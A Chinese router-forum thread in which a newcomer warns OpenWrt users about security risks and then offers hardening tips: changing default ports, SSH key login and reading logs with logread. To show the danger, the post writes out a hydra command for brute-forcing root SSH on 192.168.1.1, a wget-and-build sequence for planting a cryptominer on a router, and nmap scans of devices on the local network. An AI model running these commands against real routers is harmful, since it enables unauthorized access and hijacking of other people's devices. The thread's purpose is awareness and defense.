找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 33954|回复: 199

[新人勿喷]快检查一下自己的openwrt有多危险

 火... [复制链接]
发表于 2020-4-20 22:38 | 显示全部楼层 |阅读模式
本帖最后由 EldersJavas 于 2020-4-20 22:47 编辑
第一次发帖,自己技术很渣,请大佬们多多指教

混迹恩山一段时间,大佬如云,也解决了我的很多问题,
最近读了不少关于个人信息安全的文章,虽然离大家都很遥远,但实际上漏洞百出.
大家可能都想:我自己路由器又没有别人连,自己也没什么信息可偷.
但是,越是我们不注意的地方越容易入侵,因此我们还是要注意一下安全的.
至于为什么不发到网络安全区里,一个是这个教程比较适合openwrt,再一个,那个区看的人也比较少...


首先我举几个细思极恐的例子:
1.假设你的朋友图谋不轨(哈哈),并且知道了你的连接密码.
2.假设你的路由器某个端口暴露在外,恰恰那个端口的服务是有漏洞的(不要感觉搞笑,这样的例子太多了)
3.假设自己电脑中病毒,路由器和路由器的其他用户会...


所以用人话说的话一般(注意是一般)会出现以下几个风险:
1.一个打算搞你的人在你的网络里
2.你的路由器外部端口被利用
3.内部主机出现无法管控的情况(和情况1差不多)


你又会想了:怕啥,路由器搞坏了再刷,还能进自己电脑咋滴


那我们来几个实战:


1.破解正常的ssh密码
你知道这个操作多简单吗,只需要一行代码
  1. hydra -l root  -P pwd2.dic -t 1 -vV -e ns  -o 存个地方.txt  192.168.1.1  ssh
复制代码
至于时间...按照本分区大部分发布的openwrt包来看,使用初始密码的ssh破解也就不用半分钟...(password/admin/12345678/openwrt/...)
这不是最恐怖的...最恐怖的是绝大部分的ssh登录的都是root用户,root能干撒大佬们都心知肚明.
然后大佬们又说了:怕啥,不就个ssh,能干啥

2.路由器先挖个kuang
如果你会shell,一行也够了(好像所有代码用shell一行也能实现...)
最近比较火的有某X字头矿,某Hub上也有开源的挖此kuang软件
手打也就6行:
  1. >wget https://github.com/你懂的/你懂的.tar.gz
  2. tar -zxvf 你懂的.tar.gz
  3. ./configure
  4. make
  5. make install
  6. xxxxx xxx(你懂的)
复制代码
然后他就可以躺着赚钱了,顺便让你路由器卡的一批
你又说了:管他,我随随便便给他关了


3.问候你电脑和手机
首先随随便便扫个IP
  1. nmap -sP 192.168.1.1/24
复制代码

呦呦呦,出来个设备192.168.1.100,再来
  1. nmap -sV -T4 -O -F --version-light 192.168.1.100
复制代码
不错,是个Linux,排除你家电脑Linux,肯定就是手机了,开始整活
  1. 某m头软件,再放代码就要封号了
复制代码

(看到这里,不知道你心里什么感受,我猜是想骂我了)


前面三个情况,随便一个都很容易搞这三个步骤,大佬们肯定懂.
最恐怖的是,ssh仅仅是众多openwrt漏洞中的一个,由于openwrt自带的ssh版本不是最新,即使你把密码设置的再复杂,也可以通过中间人漏洞利用你.

下面就是本贴精华内容(没错,你完全可以把上面当成废话)

1.藏得住端口
注意,此方法只适用于和我一样菜的新手和网络大面积扫描
新手肯定是使用各种工具的,比如最出名的某k字头系统自带的网络恶俗套装
而大面积扫描,一个个端口扫描必定会浪费大量资源
于是,小白式的新手工具或代码一般只会扫描著名端口(就是各种服务默认的端口)
例子很多:21(FTP)/22(SSH)/80(Web)/443(https)/8080(偷懒改个网站端口)/53(DNS)/139(论坛里大部分包的samba端口)
如果你端口全部默认,就中枪了
改也特别简单,全部都换个端口行了,web面板上大部分能修改,实在不行上指令


2.经得起验证
还是拿最典型的SSH为例(虽然telnet也能搞,但是毕竟要淘汰了么)
web面板下面有个ssh密钥,大部分人不太会用,这里顺便教一下最简单的设置
  1. #到Linux系统里搞
复制代码
ps:上面这个代码框吞了我打的三次代码,只能在下面打了
#################
#到Linux系统里搞
cd /root/.ssh
ssh-keygen -t rsa -b 4096
vi id_rsa.pub
#把里面文本复制到web面板ssh公钥文本框里保存
ssh -i ./id_rsa root@192.168.1
#################
这样,除非有人打开你电脑偷走密钥(id_rsa文件)不然谁也无法使用ssh了
如果大家还想搞点别的花样,我可以再水个新帖好好搞搞ssh


3.日志抓小偷
删库跑路...那只能怪你惹得人太残暴
日志现在openwrt比较常用的就是logread,直接输看看效果(盗了个图,侵删)

你会发现信息跑半年,比较难受
那好办,咱还有指令,logread -h看看都能干啥
几个常用的:
  1. logread -l 数 #显示最近的几行日志
  2. logread -p 路径 #将日志输出到指定文件
复制代码
挺简单吧,当然logread是最基础的,删库也不是难事,当然完全可以通过安装第三方软件搞,还安全.

还想写几个的,这样吧,以后我可以专门开个水贴,时不时更新几个安全知识
还请大佬们轻喷轻喷

第一次发帖,给大家发个福利,送大家最开始一直提到的那个软件吧,无论是检查网络问题还是搞点小事情都挺好用
Nmap官网:https://nmap.org/dist/nmap-7.80-setup.exe
度盘还是直接挂掉
太慢试试这个:http://sqdownd.onlinedown.net/down/nmap-7.01-setup.zip


评分

参与人数 2恩山币 0 收起 理由
xzem -1 2333
二到正无穷 + 1 恩山全体路由党向你学习!

查看全部评分

只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
发表于 2020-4-20 22:43 | 显示全部楼层
顶楼主啦..希望楼主多发精品好帖啦.....
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:44 | 显示全部楼层
适当的的的
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:47 | 显示全部楼层
说说看,满足条件1的用户比例是多少呢?很多貌似很厉害,很危险的漏洞,其实都是从内部发起的,只要内部没这样的东西,就可以放心很多。
1.一个打算搞你的人在你的网络里

点评

我也就是学了些皮毛,请大佬谅解 虽然有仇的人很少,但是也不能排除通过破解密码进入网络,其实说到底,只要在内部搞到权限就是最危险的 无论什么漏洞还是攻击,中间很多操作就是提权.  详情 回复 发表于 2020-4-20 22:54
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:47 | 显示全部楼层
看看看快看快看
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:48 | 显示全部楼层
不错不错!!!!!!!!!
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:50 | 显示全部楼层
penwrt有多危险 [修
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:52 | 显示全部楼层
看得心里拔凉拔凉的。。。
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-4-20 22:54 | 显示全部楼层
falltree 发表于 2020-4-20 22:47
说说看,满足条件1的用户比例是多少呢?很多貌似很厉害,很危险的漏洞,其实都是从内部发起的,只要内部没 ...

我也就是学了些皮毛,请大佬谅解
虽然有仇的人很少,但是也不能排除通过破解密码进入网络,其实说到底,只要在内部搞到权限就是最危险的
无论什么漏洞还是攻击,中间很多操作就是提权.
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:55 | 显示全部楼层
楼主厉害
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:57 | 显示全部楼层
说了那么多,你可以随便入侵别人路由器?

点评

自己很垃圾,大佬多多指教 其实有时候真的是防不胜防,我们要做的不是考虑入侵,而且考虑如何设防,保护自己的数据 现在的安全体系总体上攻的困难还是要大于防的,所以防不是什么难事,就是个何乐而不为的小事. 其实也  详情 回复 发表于 2020-4-20 23:05
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 22:58 | 显示全部楼层
感谢大佬分享
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-4-20 23:05 | 显示全部楼层
pbx168 发表于 2020-4-20 22:57
说了那么多,你可以随便入侵别人路由器?

自己很垃圾,大佬多多指教
其实有时候真的是防不胜防,我们要做的不是考虑入侵,而且考虑如何设防,保护自己的数据
现在的安全体系总体上攻的困难还是要大于防的,所以防不是什么难事,就是个何乐而不为的小事.
其实也就是取决于自己的喜好,和自己信息的价值吧
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 23:05 | 显示全部楼层
那得要看看了
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2020-4-20 23:08 | 显示全部楼层
关闭远程连接SSH怎样?

点评

关闭ssh肯定是没问题了,当然既然能关闭就有办法打开,这就要利用一些别的漏洞了,比如论坛里面大部分的包的samba都是有漏洞的  详情 回复 发表于 2020-4-20 23:10
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

欢迎大家光临恩山无线论坛上一条 /1 下一条

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-9-23 14:36

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com

快速回复 返回顶部 返回列表